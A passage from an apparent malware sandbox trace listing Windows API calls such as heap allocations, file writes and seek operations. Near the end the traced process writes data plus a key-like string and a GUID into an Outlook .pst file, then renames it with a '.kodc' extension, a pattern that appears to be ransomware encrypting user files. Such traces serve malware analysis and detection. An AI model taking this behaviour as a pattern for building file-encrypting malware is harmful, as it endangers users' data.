RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7f68 [0101.021] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0101.021] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c428 [0101.021] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0101.021] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0101.021] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0101.021] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c540 [0101.021] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0101.021] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0101.021] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0101.021] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7f80 | out: hHeap=0x630000) returned 1 [0101.021] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0101.021] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7f68 | out: hHeap=0x630000) returned 1 [0101.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0101.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0101.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0101.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0101.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0101.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0101.022] GetCurrentThreadId () returned 0x42c [0101.022] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0101.022] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba7c48 [0101.022] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0101.022] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693158 [0101.022] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0101.022] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0101.022] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0101.022] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0101.022] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.022] GetCurrentThreadId () returned 0x42c [0101.022] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.023] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.023] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0101.023] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.023] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.023] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.023] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.023] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0101.023] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0101.023] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0101.023] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318138 [0101.023] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0101.023] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0101.023] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0101.023] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0101.023] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0101.023] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0101.023] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0101.023] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0101.024] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0101.024] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0101.024] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0101.024] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0101.024] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7f68 [0101.024] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0101.024] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0101.024] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0101.024] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0101.024] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0101.024] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0101.024] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0101.024] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7f80 [0101.024] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0101.024] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0101.024] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0101.025] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7f50 [0101.025] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0101.025] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0101.025] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0101.025] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0101.025] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0101.025] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0101.025] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0101.025] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7f98 [0101.025] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0101.025] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7a40 [0101.025] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0101.025] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0101.025] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0101.025] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0101.025] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0101.025] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0101.026] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7f68 | out: hHeap=0x630000) returned 1 [0101.026] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7f68 [0101.026] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0101.026] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0101.026] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0101.026] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0101.026] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0101.026] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0101.026] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0101.026] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c658 [0101.026] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0101.026] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0101.026] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7f68 | out: hHeap=0x630000) returned 1 [0101.026] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x9b9c950 [0101.026] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0101.026] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0101.027] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0101.027] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693158 | out: hHeap=0x630000) returned 1 [0101.027] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0101.027] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0101.027] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0101.027] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0101.027] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0101.027] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0101.027] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0101.027] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0101.027] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7f98 | out: hHeap=0x630000) returned 1 [0101.027] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0101.027] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0101.027] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0101.027] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7f80 | out: hHeap=0x630000) returned 1 [0101.027] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7f50 | out: hHeap=0x630000) returned 1 [0101.027] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0101.027] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0101.027] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0101.027] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7f38 | out: hHeap=0x630000) returned 1 [0101.027] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb5db8 | out: hHeap=0x630000) returned 1 [0101.027] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0101.028] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0101.028] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318138 | out: hHeap=0x630000) returned 1 [0101.028] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0101.028] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0101.028] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0101.028] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0101.028] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338dc8 | out: hHeap=0x630000) returned 1 [0101.028] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0101.028] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0101.028] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0101.028] WriteFile (in: hFile=0x5cc, lpBuffer=0x9bb8968*, nNumberOfBytesToWrite=0x25800, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9bb8968*, lpNumberOfBytesWritten=0x9e2fb14*=0x25800, lpOverlapped=0x0) returned 1 [0101.029] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8968 | out: hHeap=0x630000) returned 1 [0101.029] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x42400, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.029] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0101.354] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0101.354] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce5b0 [0101.354] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x9b9c950 [0101.354] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9b9c950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0101.354] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x694598 [0101.354] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0101.354] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce5b0 | out: hHeap=0x630000) returned 1 [0101.354] WriteFile (in: hFile=0x5cc, lpBuffer=0x694598*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x694598*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0101.355] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0101.355] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0101.355] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0101.355] CloseHandle (hObject=0x5cc) returned 1 [0101.359] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x32c9230 [0101.359] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x33515f0 [0101.360] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32c9230 | out: hHeap=0x630000) returned 1 [0101.360] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst.kodc")) returned 1 [0101.360] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33515f0 | out: hHeap=0x630000) returned 1 [0101.360] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.360] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.362] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b2de0 | out: hHeap=0x630000) returned 1 [0101.362] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x6228cf40, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 0 [0101.362] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0101.362] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317100 | out: hHeap=0x630000) returned 1 [0101.362] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332dc90 | out: hHeap=0x630000) returned 1 [0101.362] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0101.362] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce5b0 [0101.362] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0101.362] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.362] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0101.362] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.362] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.362] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.362] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0101.362] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.362] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.362] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.362] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0101.362] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.362] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.362] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.362] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0101.362] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.362] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.362] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.363] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0101.363] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.363] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.363] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.363] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0101.363] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.363] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.363] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.363] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0101.363] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x9b91b28 [0101.363] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.363] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0101.363] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.363] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.363] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0101.363] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.363] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.363] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.363] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0101.363] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.363] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.363] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.363] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0101.363] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0101.363] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.363] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.363] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0101.363] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0101.363] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.364] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.364] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0101.364] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.364] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.364] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.364] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0101.364] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.364] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.364] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.364] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0101.364] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.364] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.364] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.364] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0101.364] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.364] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.364] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.364] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0101.364] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.364] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.364] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.364] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0101.364] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.364] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce618 | out: hHeap=0x630000) returned 1 [0101.364] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0101.364] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0101.365] HeapFree (in: 